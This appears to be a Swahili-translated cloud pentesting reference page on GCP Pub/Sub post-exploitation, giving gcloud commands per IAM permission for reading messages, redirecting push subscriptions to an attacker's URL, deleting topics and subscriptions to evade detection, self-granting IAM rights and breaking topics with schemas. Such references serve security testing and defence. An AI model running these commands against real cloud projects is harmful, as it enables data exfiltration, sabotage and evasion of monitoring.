GCP - Pub/Sub Post Exploitation

Reading time: 4 minutes

Pub/Sub

Kwa maelezo zaidi kuhusu Pub/Sub angalia ukurasa ufuatao:

GCP - Pub/Sub Enum

pubsub.topics.publish

Chapisha ujumbe katika mada, muhimu kwa kutuma data zisizotarajiwa na kuanzisha kazi zisizotarajiwa au kutumia udhaifu:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Inatumika kuzuia usajili kupokea ujumbe, labda ili kuepuka kugunduliwa.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Inatumika kuzuia usajili kupokea ujumbe, labda ili kuepuka kugunduliwa.
Inawezekana kufuta mada hata ikiwa na usajili uliofungwa nayo.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Tumia ruhusa hii kuboresha mipangilio fulani ya mada ili kuharibu, kama --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Jipatie ruhusa ya kufanya mashambulizi yoyote ya hapo awali.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Pata ujumbe wote katika seva ya wavuti:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Unda usajili na utumie ku vuta ujumbe:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Kufuta usajili kunaweza kuwa na manufaa kuharibu mfumo wa usindikaji wa kumbukumbu au kitu kinachofanana:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Tumia ruhusa hii kuboresha baadhi ya mipangilio ili ujumbe uhifadhiwe mahali unapoweza kufikia (URL, meza ya Big Query, Bucket) au tu kuharibu.

gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>

pubsub.subscriptions.setIamPolicy

Jipe ruhusa zinazohitajika kutekeleza mashambulizi yoyote yaliyotajwa hapo awali.

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Shambulia muundo kwa mada ili ujumbe usifanye hivyo na hivyo mada ikatishwa.
Ikiwa hakuna muundo, huenda ukahitaji kuunda mmoja.

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

pubsub.schemas.delete

Hii inaweza kuonekana kama kufuta muundo lakini utaweza kutuma ujumbe ambao haukidhi muundo. Hata hivyo, kwa kuwa muundo utafutwa, hakuna ujumbe utakaoweza kuingia ndani ya mada. Hivyo hii ni HAINA MANUFA:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.setIamPolicy

Jipe ruhusa zinazohitajika kutekeleza mashambulizi yoyote yaliyojadiliwa hapo awali.

pubsub.snapshots.create, pubsub.snapshots.seek

Hii itaunda picha ya ujumbe wote ambao haujakubaliwa na kuwarudisha kwenye usajili. Si ya manufaa sana kwa mshambuliaji lakini hapa iko:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME